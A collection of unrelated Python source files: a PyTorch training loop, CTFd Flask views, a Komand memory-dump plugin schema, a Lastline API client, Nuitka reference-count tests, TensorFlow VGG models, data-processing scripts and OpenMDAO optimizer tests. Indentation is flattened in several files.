images, rand_num, labels, sum = images.to(device), rand_num.to(device), labels.to(device), sum.to(device)
preds, n = model(images, rand_num)
loss=criterion(preds, labels)
optimizer.zero_grad()
loss.backward() # calc grad through backprop
optimizer.step() # update network weights
# update loss and accuracy
train_loss += loss
train_loss_item += loss.item()
train_correct += correct_pred(preds, labels)
# running model on test data
with torch.no_grad():
for batch in testloader:
images, rand_num, labels, sum = batch
images, rand_num, labels, sum = images.to(device), rand_num.to(device), labels.to(device), sum.to(device)
preds, num = model(images, rand_num)
loss=criterion(preds, labels)
test_loss += loss.item()
test_correct += correct_pred(preds, labels)
    train_acc = train_correct / len(trainloader.dataset) * 100
    test_acc = test_correct / len(testloader.dataset) * 100
print(f'TrainSet: [Accuracy={train_acc}, Loss={train_loss}]')
print(f'TestSet: [Accuracy:{test_acc}, Loss:{test_loss}]\n')
# tensorboard integration
tb.add_scalar('Train Loss', train_loss, e )
tb.add_scalar('Train Accuracy', train_acc, e )
tb.add_scalar('Test Loss', test_loss, e )
tb.add_scalar('Test Accuracy', test_acc, e )
tb.close()
"""###**TensorBoard Dashboard**"""
# Commented out IPython magic to ensure Python compatibility.
# %tensorboard --logdir /content/runs
|
py | b4041da95499eec1eebf357ec293a261bd790043 | from flask import (
current_app as app,
render_template,
request,
redirect,
abort,
url_for,
session,
Blueprint,
Response,
send_file,
)
from flask.helpers import safe_join
from CTFd.models import db, Users, Admins, Teams, Files, Pages, Notifications
from CTFd.utils import markdown
from CTFd.cache import cache
from CTFd.utils import get_config, set_config
from CTFd.utils.user import authed, get_current_user
from CTFd.utils import config
from CTFd.utils.uploads import get_uploader
from CTFd.utils.config.pages import get_page
from CTFd.utils.config.visibility import challenges_visible
from CTFd.utils.security.auth import login_user
from CTFd.utils.security.csrf import generate_nonce
from CTFd.utils import user as current_user
from CTFd.utils.dates import ctftime
from CTFd.utils.decorators import authed_only
from CTFd.utils.security.signing import (
unserialize,
BadTimeSignature,
SignatureExpired,
BadSignature,
)
from sqlalchemy.exc import IntegrityError
import os
views = Blueprint("views", __name__)
@views.route("/setup", methods=["GET", "POST"])
def setup():
if not config.is_setup():
if not session.get("nonce"):
session["nonce"] = generate_nonce()
if request.method == "POST":
ctf_name = request.form["ctf_name"]
set_config("ctf_name", ctf_name)
# CSS
set_config("start", "")
# Admin user
name = request.form["name"]
email = request.form["email"]
password = request.form["password"]
admin = Admins(
name=name, email=email, password=password, type="admin", hidden=True
)
user_mode = request.form["user_mode"]
set_config("user_mode", user_mode)
# Index page
index = """<div class="row">
<div class="col-md-6 offset-md-3">
<img class="w-100 mx-auto d-block" style="max-width: 500px;padding: 50px;padding-top: 14vh;" src="themes/core/static/img/logo.png" />
<h3 class="text-center">
<p>A cool CTF platform from <a href="https://ctfd.io">ctfd.io</a></p>
<p>Follow us on social media:</p>
<a href="https://twitter.com/ctfdio"><i class="fab fa-twitter fa-2x" aria-hidden="true"></i></a>
<a href="https://facebook.com/ctfdio"><i class="fab fa-facebook fa-2x" aria-hidden="true"></i></a>
<a href="https://github.com/ctfd"><i class="fab fa-github fa-2x" aria-hidden="true"></i></a>
</h3>
<br>
<h4 class="text-center">
<a href="admin">Click here</a> to login and setup your CTF
</h4>
</div>
</div>""".format(
request.script_root
)
page = Pages(title=None, route="index", content=index, draft=False)
# Visibility
set_config("challenge_visibility", "private")
set_config("registration_visibility", "public")
set_config("score_visibility", "public")
set_config("account_visibility", "public")
# Start time
set_config("start", None)
set_config("end", None)
set_config("freeze", None)
# Verify emails
set_config("verify_emails", None)
set_config("mail_server", None)
set_config("mail_port", None)
set_config("mail_tls", None)
set_config("mail_ssl", None)
set_config("mail_username", None)
set_config("mail_password", None)
set_config("mail_useauth", None)
set_config("setup", True)
try:
db.session.add(admin)
db.session.commit()
except IntegrityError:
db.session.rollback()
try:
db.session.add(page)
db.session.commit()
except IntegrityError:
db.session.rollback()
login_user(admin)
db.session.close()
app.setup = False
with app.app_context():
cache.clear()
return redirect(url_for("views.static_html"))
return render_template("setup.html", nonce=session.get("nonce"))
return redirect(url_for("views.static_html"))
@views.route("/notifications", methods=["GET"])
def notifications():
notifications = Notifications.query.order_by(Notifications.id.desc()).all()
return render_template("notifications.html", notifications=notifications)
@views.route("/settings", methods=["GET"])
@authed_only
def settings():
user = get_current_user()
name = user.name
email = user.email
website = user.website
affiliation = user.affiliation
country = user.country
prevent_name_change = get_config("prevent_name_change")
confirm_email = get_config("verify_emails") and not user.verified
return render_template(
"settings.html",
name=name,
email=email,
website=website,
affiliation=affiliation,
country=country,
prevent_name_change=prevent_name_change,
confirm_email=confirm_email,
)
@views.route("/static/user.css")
def custom_css():
"""
Custom CSS Handler route
:return:
"""
return Response(get_config("css"), mimetype="text/css")
@views.route("/", defaults={"route": "index"})
@views.route("/<path:route>")
def static_html(route):
"""
Route in charge of routing users to Pages.
:param route:
:return:
"""
page = get_page(route)
if page is None:
abort(404)
else:
if page.auth_required and authed() is False:
return redirect(url_for("auth.login", next=request.full_path))
return render_template("page.html", content=markdown(page.content))
@views.route("/files", defaults={"path": ""})
@views.route("/files/<path:path>")
def files(path):
"""
Route in charge of dealing with making sure that CTF challenges are only accessible during the competition.
:param path:
:return:
"""
f = Files.query.filter_by(location=path).first_or_404()
if f.type == "challenge":
if challenges_visible():
if current_user.is_admin() is False:
if not ctftime():
abort(403)
else:
if not ctftime():
abort(403)
# Allow downloads if a valid token is provided
token = request.args.get("token", "")
try:
data = unserialize(token, max_age=3600)
user_id = data.get("user_id")
team_id = data.get("team_id")
file_id = data.get("file_id")
user = Users.query.filter_by(id=user_id).first()
team = Teams.query.filter_by(id=team_id).first()
# Check user is admin if challenge_visibility is admins only
if (
get_config("challenge_visibility") == "admins"
and user.type != "admin"
):
abort(403)
# Check that the user exists and isn't banned
if user:
if user.banned:
abort(403)
else:
abort(403)
# Check that the team isn't banned
if team:
if team.banned:
abort(403)
else:
pass
# Check that the token properly refers to the file
if file_id != f.id:
abort(403)
# The token isn't expired or broken
except (BadTimeSignature, SignatureExpired, BadSignature):
abort(403)
uploader = get_uploader()
try:
return uploader.download(f.location)
except IOError:
abort(404)
@views.route("/themes/<theme>/static/<path:path>")
def themes(theme, path):
"""
General static file handler
:param theme:
:param path:
:return:
"""
filename = safe_join(app.root_path, "themes", theme, "static", path)
if os.path.isfile(filename):
return send_file(filename)
else:
abort(404)
|
py | b4041df4e3b67348fb5f3469c195912dcafc02fc | # GENERATED BY KOMAND SDK - DO NOT EDIT
import komand
import json
class Component:
DESCRIPTION = "Returns one memory dump file associated with the specified task ID"
class Input:
PID = "pid"
TASK_ID = "task_id"
class Output:
CONTENTS = "contents"
class GetMemoryInput(komand.Input):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"pid": {
"type": "string",
"title": "Process ID",
"description": "Process ID",
"order": 2
},
"task_id": {
"type": "integer",
"title": "Task ID",
"description": "Task ID",
"order": 1
}
},
"required": [
"pid",
"task_id"
]
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
class GetMemoryOutput(komand.Output):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"contents": {
"type": "string",
"title": "Dump Contents",
"displayType": "bytes",
"description": "Base64 encoded contents",
"format": "bytes",
"order": 1
}
},
"required": [
"contents"
]
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
|
py | b4041e40913753fbe2226628729b949778c6f207 | """
PAPI client view for talking to the Appliance Management API
:Copyright:
Copyright 2014 Lastline, Inc. All Rights Reserved.
"""
from papi_client import loader
from papi_client import papi_client
class PapiClientApplianceMgmt(loader.PapiViewClient):
"""
    Client to access the Lastline Appliance Management API
Detailed documentation can be found at the following URL::
https://user.lastline.com/papi-doc/api/html/appliance_mgmt/overview.html
API methods on this client take a "raw" parameter.
- If raw is set to True, the client will return the raw server response
(that is, the HTTP body) so long as the HTTP request is successful.
If the HTTP request fails a `papi_client.papi_client.CommunicationError`
is raised
- If raw is set to False, the client will try to parse the json response
and return the data field of the response. If the API response is an
error, a `papi_client.papi_client.ApiError` is raised.
:param base_client: This is the client that actually sends requests
to the API server.
:type base_client: `papi_client.papi_client.PapiClient`
:param logger: python logger to which we will log
"""
def __init__(self, base_client, logger=None):
loader.PapiViewClient.__init__(self, "appliance_mgmt", base_client,
logger=logger,
description="Appliance Management API")
def ping(self, raw=False):
"""
Ping this API to verify it is supported by the server.
"""
return self._get("ping", raw=raw)
def get_overview(self, user_id=None, raw=False):
"""
"""
params = {}
if user_id is not None:
params["user_id"] = int(user_id)
return self._get("overview", params=params, raw=raw)
def get_configuration(self, appliance_uuid, user_id=None, raw=False):
"""
Get the current configuration of an appliance.
:param appliance_uuid: Unique identifier of the appliance as received by
`get_overview()`.
"""
params = {"appliance_uuid": appliance_uuid}
if user_id is not None:
params["user_id"] = int(user_id)
return self._get("configuration", params=params, raw=raw)
def _do_action(self, appliance_uuid, action_type, action_parameters=None,
user_id=None, raw=False):
"""
Execute an action on an appliance.
:param appliance_uuid: Unique identifier of the appliance as received by
`get_overview()`.
:param action_type: The action to execute, e.g., CONFIGURE
:param action_parameters: A dict representing parameters depending on
the selected action.
"""
data = {
"appliance_uuid": appliance_uuid,
"action_type": action_type,
}
if user_id is not None:
data["user_id"] = int(user_id)
if action_parameters is not None:
data["action_parameters"] = papi_client.json.dumps(action_parameters)
return self._post("action/request", data=data, raw=raw)
def configure(self, appliance_uuid, software_version=None, auto_update=None,
settings=None, user_id=None, raw=False):
"""
Configure or re-trigger a configuration on an appliance.
See the URL above for a more extensive description of the parameters.
:param appliance_uuid: Unique identifier of the appliance as received by
`get_overview()`.
:param software_version: Set the appliance to this version.
:param auto_update: Enable or disable auto_update on this appliance.
:param settings: Type and version specific settings to configure on
the appliance. The current and default settings of a given
appliance can be received using `get_configuration()`.
"""
action_parameters = {}
if settings:
action_parameters["settings"] = settings
if auto_update is not None:
action_parameters["auto_update"] = auto_update
if software_version:
action_parameters["software_version"] = software_version
return self._do_action(
appliance_uuid=appliance_uuid,
action_type="CONFIGURE",
action_parameters=action_parameters,
user_id=user_id,
raw=raw
)
def get_action_status(self, action_uuid, user_id=None, raw=False):
"""
Get the status of an action identified by its action_uuid.
:param action_uuid: Unique identifier of the Action
"""
params = {"action_uuid": action_uuid}
if user_id is not None:
params["user_id"] = int(user_id)
return self._get("action/status", params=params, raw=raw)
|
py | b4041ea76205a1f2c0a4c26519f6c78476d25e88 | # Copyright 2019, Kay Hayen, mailto:[email protected]
#
# Python tests originally created or extracted from other people's work. The
# parts were too small to be protected.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Reference counting tests.
These contain functions that do specific things, where we have a suspect
that references may be lost or corrupted. Executing them repeatedly and
checking the reference count is how they are used.
These are Python3.5 specific constructs, that will give a SyntaxError or
not be relevant on older versions.
"""
import os
import sys
# Find nuitka package relative to us.
sys.path.insert(
0,
os.path.normpath(
os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "..")
),
)
# isort:start
import types
from nuitka.tools.testing.Common import (
checkDebugPython,
executeReferenceChecked,
run_async,
)
checkDebugPython()
def raisy():
raise TypeError
def simpleFunction1():
async def someCoroutine():
return
run_async(someCoroutine())
####################################
def simpleFunction2():
async def someCoroutine():
return 7
run_async(someCoroutine())
####################################
class AsyncIteratorWrapper:
def __init__(self, obj):
self._it = iter(obj)
def __aiter__(self):
return self
async def __anext__(self):
try:
value = next(self._it)
except StopIteration:
raise StopAsyncIteration
return value
def simpleFunction3():
async def f():
result = []
# Python 3.5 before 3.2 won't allow this.
try:
async for letter in AsyncIteratorWrapper("abcdefg"):
result.append(letter)
except TypeError:
assert sys.version_info < (3, 5, 2)
return result
run_async(f())
####################################
def simpleFunction4():
async def someCoroutine():
raise StopIteration
try:
run_async(someCoroutine())
except RuntimeError:
pass
####################################
class ClassWithAsyncMethod:
async def async_method(self):
return self
def simpleFunction5():
run_async(ClassWithAsyncMethod().async_method())
####################################
class BadAsyncIter:
def __init__(self):
self.weight = 1
async def __aiter__(self):
return self
def __anext__(self):
return ()
def simpleFunction7():
async def someCoroutine():
async for i in BadAsyncIter():
print("never going to happen")
try:
run_async(someCoroutine())
except TypeError:
pass
def simpleFunction8():
async def someCoroutine():
return ("some", "thing")
@types.coroutine
def someDecoratorCoroutine():
yield from someCoroutine()
run_async(someDecoratorCoroutine())
def simpleFunction9():
a = {"a": 1, "b": 2}
b = {"c": 3, **a}
return b
# These need stderr to be wrapped.
tests_stderr = ()
# Disabled tests
tests_skipped = {}
result = executeReferenceChecked(
prefix="simpleFunction",
names=globals(),
tests_skipped=tests_skipped,
tests_stderr=tests_stderr,
)
sys.exit(0 if result else 1)
|
py | b4041ff3b87d29e022a48dee158fe7b589485c87 | """
Code is modified from the PyTorch and TensorFlow versions of VGG:
https://github.com/pytorch/vision/blob/master/torchvision/models/vgg.py, and
https://github.com/keras-team/keras-applications/blob/master/keras_applications/vgg16.py
"""
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import numpy as np
import pdb
from tensorflow.keras.applications.vgg16 import VGG16 as vgg16
from tensorflow.keras.applications.vgg19 import VGG19 as vgg19
__all__ = ['VGG11', 'VGG13', 'VGG16','VGG19']
def VGG(feature, num_cls):
with tf.variable_scope('fully_connected') as scope:
        dim = np.prod(feature.shape[1:])
x = tf.reshape(feature, [-1, dim])
x = tf.keras.layers.Dense(units=4096, activation='relu', name=scope.name)(x)
x = tf.keras.layers.Dense(units=4096, activation='relu', name=scope.name)(x)
x = tf.keras.layers.Dense(units=num_cls, name=scope.name)(x)
return x
def make_layers(x, cfg):
for v in cfg:
if v == 'M':
x = tf.keras.layers.MaxPool2D(pool_size=[2, 2], strides=2, padding='valid')(x)
else:
x = tf.keras.layers.Conv2D(
filters=v,
kernel_size=[3, 3],
padding='SAME',
activation=tf.nn.relu
)(x)
return x
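# VGG configurations: integers give the filter count of a 3x3 conv layer, 'M' inserts a
# 2x2 max-pooling layer; 'A', 'B', 'D' and 'E' correspond to VGG11, VGG13, VGG16 and VGG19.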
cfg = {
'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M',
512, 512, 512, 512, 'M'],
}
def VGG11(x_images, num_cls):
feature = make_layers(x_images, cfg['A'])
return VGG(feature, num_cls)
def VGG13(x_images, num_cls):
feature = make_layers(x_images, cfg['B'])
return VGG(feature, num_cls)
def VGG16(x_images, num_cls):
feature = make_layers(x_images, cfg['D'])
return VGG(feature, num_cls)
def VGG19(x_images, num_cls):
feature = make_layers(x_images, cfg['E'])
return VGG(feature, num_cls)
|
py | b40422b15f7d4d1f8b512a794df0836fdca83139 | from fixture.orm import ORMFixture
class DbFixture:
def __init__(self, host, database, user, password):
self.host = host
self.database = database
self.user = user
self.password = password
self.orm = ORMFixture(host=host, database=database, user=user, password=password)
def get_groups_list(self):
return self.orm.get_groups_list()
def get_contacts_list(self):
return self.orm.get_contacts_list()
def get_contacts_list_in_group(self, group):
return self.orm.get_contacts_in_group(group)
def get_contacts_not_in_group(self, group):
return self.orm.get_contacts_not_in_group(group)
|
py | b404234d443588defa20a78cd05805c2fea5d632 | #!/usr/bin/env python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import benchy_config as config
import benchy_utils as utils
import multiprocessing
import os
import shlex
import shutil
import subprocess
class Platform(object):
"""Facebook-specific Platform object.
"""
def __init__(self):
self.name = "fb"
self.build_internal_path = os.path.join(
config.SRCROOT_PATH[1:], '_build', 'USE_LOWPTR-opt', 'hphp')
def switch_to_branch(self, branch):
"""Switches the current repository to the specified branch.
This function will always be invoked prior to building a branch.
"""
utils.run_command('arc feature %s' % branch.name)
def build_branch(self, branch):
"""Builds the specified branch.
This function will always be invoked after switching to a branch.
"""
build_dir = branch.build_dir()
build_link = os.path.join(config.SRCROOT_PATH, '_build')
if os.path.islink(build_link):
os.remove(build_link)
else:
shutil.rmtree(build_link, ignore_errors=True)
env = os.environ.copy()
env['FBMAKE_BUILD_ROOT'] = build_dir
cpus = multiprocessing.cpu_count()
utils.run_command('/usr/local/bin/fbmake --build-root "%s" '
'--build-flag USE_LOWPTR --distcc=off opt -j%d' % (build_dir, cpus), env=env)
|
py | b4042454a3294f1ac08e4931c592bd19ef79e9f2 | import xarray as xr
import numpy as np
import pei.myfunctions as mf
from xhistogram.xarray import histogram
# Load WBT data
ds = xr.open_mfdataset('../data/processed/WBTdaily/WBTdailyens*.nc',combine='nested',concat_dim='ensemble',chunks={'time':1095})
# Load area data
land_area = xr.open_dataset('../data/processed/wbt.land_area')
land_mask = np.isfinite(land_area)
# Reduce WBT data
ds_adj = ds['WBT'].where(land_mask,drop=True).rename({'__xarray_dataarray_variable__':'WBT'})
# Get WBT
var = ds_adj['WBT']
# Bins to divide data at each point in time
bins = np.arange(-52,35,0.1)
# Loop through years
for year in range(2001,2070):
# Get data for specific year
var_year = var.where(var['time.year']==year,drop=True)
# Histogram in time dimension for this year
dist = histogram(var_year,bins=[bins],dim=['time'])
# Save this year's histogram data as netCDF
dist.to_netcdf('../data/processed/WBTyearly/WBT'+str(year)+'.nc') |
py | b40424821719a36ee774ffac749418af713c217a | from setuptools import setup, find_packages
setup(name='mr_tools', version='1.0', packages=find_packages()) |
py | b404250fb3bd86f4d1c54a2a5acc607965416526 | from . import dataloader |
py | b40425c80a46e0c190721a0e9e456351e51352c7 | from collections import defaultdict
import logging
import numpy as np
class Logger:
def __init__(self, console_logger):
self.console_logger = console_logger
self.use_tb = False
self.use_sacred = False
self.use_hdf = False
self.stats = defaultdict(lambda: [])
def setup_tb(self, directory_name):
# Import here so it doesn't have to be installed if you don't use it
from tensorboard_logger import configure, log_value
configure(directory_name)
self.tb_logger = log_value
self.use_tb = True
def setup_sacred(self, sacred_run_dict):
self.sacred_info = sacred_run_dict.info
self.use_sacred = True
def log_stat(self, key, value, t, to_sacred=True):
self.stats[key].append((t, value))
if self.use_tb:
self.tb_logger(key, value, t)
if self.use_sacred and to_sacred:
if key in self.sacred_info:
self.sacred_info["{}_T".format(key)].append(t)
self.sacred_info[key].append(value)
else:
self.sacred_info["{}_T".format(key)] = [t]
self.sacred_info[key] = [value]
def print_recent_stats(self):
log_str = "Recent Stats | t_env: {:>10} | Episode: {:>8}\n".format(*self.stats["episode"][-1])
i = 0
for (k, v) in sorted(self.stats.items()):
if k == "episode":
continue
i += 1
window = 5 if k != "epsilon" else 1
item = "{:.4f}".format(np.mean([x[1] for x in self.stats[k][-window:]]))
log_str += "{:<25}{:>8}".format(k + ":", item)
log_str += "\n" if i % 4 == 0 else "\t"
self.console_logger.info(log_str)
# set up a custom logger
def get_logger():
logger = logging.getLogger()
logger.handlers = []
ch = logging.StreamHandler()
formatter = logging.Formatter('[%(levelname)s %(asctime)s] %(name)s %(message)s', '%H:%M:%S')
ch.setFormatter(formatter)
logger.addHandler(ch)
logger.setLevel('DEBUG')
return logger
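# A minimal usage sketch (illustrative only; the stat keys below are arbitrary):
#   logger = Logger(get_logger())
#   logger.log_stat("episode", 1, t=0)
#   logger.log_stat("return_mean", 1.5, t=0)
#   logger.print_recent_stats()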
|
py | b4042606d2d76266dbea892299811bd9d3b69280 | """ Unit tests for the Pyoptsparse Driver."""
import unittest
import numpy as np
from openmdao.api import Problem, Group, IndepVarComp, ExecComp, AnalysisError, ExplicitComponent
from openmdao.devtools.testutil import assert_rel_error
from openmdao.test_suite.components.paraboloid import Paraboloid
from openmdao.test_suite.components.expl_comp_array import TestExplCompArrayDense
from openmdao.test_suite.components.sellar import SellarDerivativesGrouped
from openmdao.utils.general_utils import set_pyoptsparse_opt
# check that pyoptsparse is installed
# if it is, try to use SNOPT but fall back to SLSQP
OPT, OPTIMIZER = set_pyoptsparse_opt('SNOPT')
if OPTIMIZER:
from openmdao.drivers.pyoptsparse_driver import pyOptSparseDriver
class ParaboloidAE(ExplicitComponent):
""" Evaluates the equation f(x,y) = (x-3)^2 + xy + (y+4)^2 - 3
    This version raises an analysis error on some evaluations (controlled by
    ``eval_fail_at`` and ``grad_fail_at``).
The AE in ParaboloidAE stands for AnalysisError."""
def __init__(self):
super(ParaboloidAE, self).__init__()
self.fail_hard = False
def setup(self):
self.add_input('x', val=0.0)
self.add_input('y', val=0.0)
self.add_output('f_xy', val=0.0)
self.eval_iter_count = 0
self.eval_fail_at = 3
self.grad_iter_count = 0
self.grad_fail_at = 100
self.declare_partials('*', '*')
def compute(self, inputs, outputs):
"""f(x,y) = (x-3)^2 + xy + (y+4)^2 - 3
Optimal solution (minimum): x = 6.6667; y = -7.3333
"""
if self.eval_iter_count == self.eval_fail_at:
self.eval_iter_count = 0
if self.fail_hard:
raise RuntimeError('This should error.')
else:
raise AnalysisError('Try again.')
x = inputs['x']
y = inputs['y']
outputs['f_xy'] = (x-3.0)**2 + x*y + (y+4.0)**2 - 3.0
self.eval_iter_count += 1
def compute_partials(self, inputs, partials):
""" Jacobian for our paraboloid."""
if self.grad_iter_count == self.grad_fail_at:
self.grad_iter_count = 0
if self.fail_hard:
raise RuntimeError('This should error.')
else:
raise AnalysisError('Try again.')
x = inputs['x']
y = inputs['y']
partials['f_xy','x'] = 2.0*x - 6.0 + y
partials['f_xy','y'] = 2.0*y + 8.0 + x
self.grad_iter_count += 1
class TestPyoptSparse(unittest.TestCase):
def setUp(self):
if OPT is None:
raise unittest.SkipTest("pyoptsparse is not installed")
if OPTIMIZER is None:
raise unittest.SkipTest("pyoptsparse is not providing SNOPT or SLSQP")
def test_simple_paraboloid_upper(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SLSQP':
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'], 7.16667, 1e-6)
assert_rel_error(self, prob['y'], -7.833334, 1e-6)
def test_simple_paraboloid_upper_indices(self):
prob = Problem()
model = prob.model = Group()
size = 3
model.add_subsystem('p1', IndepVarComp('x', np.array([50.0]*size)))
model.add_subsystem('p2', IndepVarComp('y', np.array([50.0]*size)))
model.add_subsystem('comp', ExecComp('f_xy = (x-3.0)**2 + x*y + (y+4.0)**2 - 3.0',
x=np.zeros(size), y=np.zeros(size),
f_xy=np.zeros(size)))
model.add_subsystem('con', ExecComp('c = - x + y',
c=np.zeros(size), x=np.zeros(size),
y=np.zeros(size)))
model.connect('p1.x', 'comp.x')
model.connect('p2.y', 'comp.y')
model.connect('p1.x', 'con.x')
model.connect('p2.y', 'con.y')
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SLSQP':
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('p1.x', indices=[1], lower=-50.0, upper=50.0)
model.add_design_var('p2.y', indices=[1], lower=-50.0, upper=50.0)
model.add_objective('comp.f_xy', index=1)
model.add_constraint('con.c', indices=[1], upper=-15.0)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['p1.x'], np.array([50., 7.16667, 50.]), 1e-6)
assert_rel_error(self, prob['p2.y'], np.array([50., -7.833334, 50.]), 1e-6)
def test_simple_paraboloid_lower(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SLSQP':
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=15.0)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'], 7.16667, 1e-6)
assert_rel_error(self, prob['y'], -7.833334, 1e-6)
def test_simple_paraboloid_lower_linear(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SLSQP':
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=15.0, linear=True)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'], 7.16667, 1e-6)
assert_rel_error(self, prob['y'], -7.833334, 1e-6)
self.assertEqual(prob.driver._quantities, ['comp.f_xy'])
def test_simple_paraboloid_equality(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SLSQP':
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', equals=-15.0)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'], 7.16667, 1e-6)
assert_rel_error(self, prob['y'], -7.833334, 1e-6)
def test_simple_paraboloid_equality_linear(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SLSQP':
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', equals=-15.0, linear=True)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'], 7.16667, 1e-6)
assert_rel_error(self, prob['y'], -7.833334, 1e-6)
def test_simple_paraboloid_double_sided_low(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=-11.0, upper=-10.0)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['y'] - prob['x'], -11.0, 1e-6)
def test_simple_paraboloid_double_sided_high(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=10.0, upper=11.0)
